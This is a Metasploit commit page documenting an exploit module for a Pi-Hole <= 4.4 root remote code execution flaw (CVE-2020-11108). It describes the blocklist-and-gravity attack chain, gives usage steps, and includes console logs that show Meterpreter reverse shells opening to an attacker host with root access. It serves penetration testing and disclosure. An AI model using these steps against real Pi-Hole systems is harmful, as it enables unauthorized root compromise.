Land #13445, Pi-Hole <= 4.4 root RCE CVE-2020-11108

rapid7 · May 18, 2020 · c019c06 · c019c06
2 parents b8ca608 + 4a39e28
commit c019c06
Show file tree

Hide file tree

Showing 2 changed files with 403 additions and 0 deletions.
diff --git a/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md b/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md
@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This exploits a command execution in Pi-Hole <= 4.4.  A new blocklist is added, and then an
+update is forced (gravity) to pull in the blocklist content.  PHP content is then written
+to a file within the webroot.
+
+Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc.
+
+Phase 2 writes our payload to `teleporter.php`, overwriting, the content.
+
+Lastly, the phase 1 PHP file is called in the web root, which launches
+our payload in `teleporter.php` with root privileges.
+
+A more detailed writeup is available from the [original author](https://frichetten.com/blog/cve-2020-11108-pihole-rce/).
+
+Due to encodings, a local web server is required to be running on port `80`.
+
+Two blocklist is left within Pi-Hole and should be removed.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_blocklist_exec```
+  4. Do: ```set srvhost [IP]```
+  5. Do: ```set rhost [IP]```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
+
+## Scenarios
+
+### Pi-Hole 4.3.2 on Ubuntu 18.04
+
+  ```
+  [*] Processing pihole.rb for ERB directives.
+  resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec
+  resource (pihole.rb)> set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  resource (pihole.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (pihole.rb)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (pihole.rb)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (pihole.rb)> set srvport 80
+  srvport => 80
+  resource (pihole.rb)> set verbose true
+  verbose => true
+  resource (pihole.rb)> exploit
+  [*] Exploit running as background job 0.
+  [*] Exploit completed, but no session was created.
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2
+  [*] Using URL: http://1.1.1.1:80/
+  [*] Using cookie: PHPSESSID=45abdcp4rsc9bpi9tchi88ejnn;
+  [*] Using token: WzmrFbksWxIbtuSVeyrf8yv9o541UdhueLN+BRXfUmY=
+  [*] Adding backdoor reference
+  [*] Forcing gravity pull
+  [*] (1/2) Sending priv esc trigger
+  [*] Adding root reference
+  [*] Forcing gravity pull
+  [*] (2/2) Sending root payload
+  [*] Popping root shell
+  [*] Sending stage (38288 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:57982) at 2020-05-12 22:30:38 -0400
+  [+] Deleted cdJWzln.php
+  [*] Server stopped.
+  
+  msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1
+  [*] Starting interaction with 1...
+  
+  meterpreter > getuid
+  Server username: root (0)
+  meterpreter > sysinfo
+  Computer    : pihole
+  OS          : Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64
+  Meterpreter : php/linux
+  ```
+
+### Pi-Hole 4.4 on Ubuntu 18.04
+
+  ```
+  [*] Processing pihole.rb for ERB directives.
+  resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec
+  resource (pihole.rb)> set payload php/meterpreter/reverse_tcp
+  payload => php/meterpreter/reverse_tcp
+  resource (pihole.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (pihole.rb)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (pihole.rb)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (pihole.rb)> set srvport 80
+  srvport => 80
+  resource (pihole.rb)> set verbose true
+  verbose => true
+  resource (pihole.rb)> exploit
+  [*] Exploit running as background job 0.
+  [*] Exploit completed, but no session was created.
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4
+  [*] Using URL: http://1.1.1.1:80/
+  [*] Using cookie: PHPSESSID=uee4gcfsjk5m8289m4uk4rv1du;
+  [*] Using token: uO4ha1e0fy+Qwvoq14XgslT3Z+VJ/h2RR3qyVT6dPz8=
+  [*] Adding backdoor reference
+  [*] Forcing gravity pull
+  [*] Received GET request.  Responding
+  [*] Sending 2nd gravity update request.
+  [*] Forcing gravity pull
+  [*] (1/2) Sending priv esc trigger
+  [*] Adding root reference
+  [*] Forcing gravity pull
+  [*] Received GET request.  Responding
+  [*] Sending 2nd gravity update request.
+  [*] Forcing gravity pull
+  [*] (2/2) Sending root payload
+  [*] Popping root shell
+  [*] Sending stage (38288 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:48636) at 2020-05-13 20:34:33 -0400
+  [+] Deleted VRwxqyhs.php
+  
+  msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1
+  [*] Starting interaction with 1...
+  
+  meterpreter > getuid
+  Server username: root (0)
+  meterpreter > sysinfo
+  Computer    : pihole
+  OS          : Linux pihole 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64
+  Meterpreter : php/linux
+  meterpreter > 
+  [*] Blocklists must be removed manually from /admin/settings.php?tab=blocklists
+  [*] Server stopped.
+  ```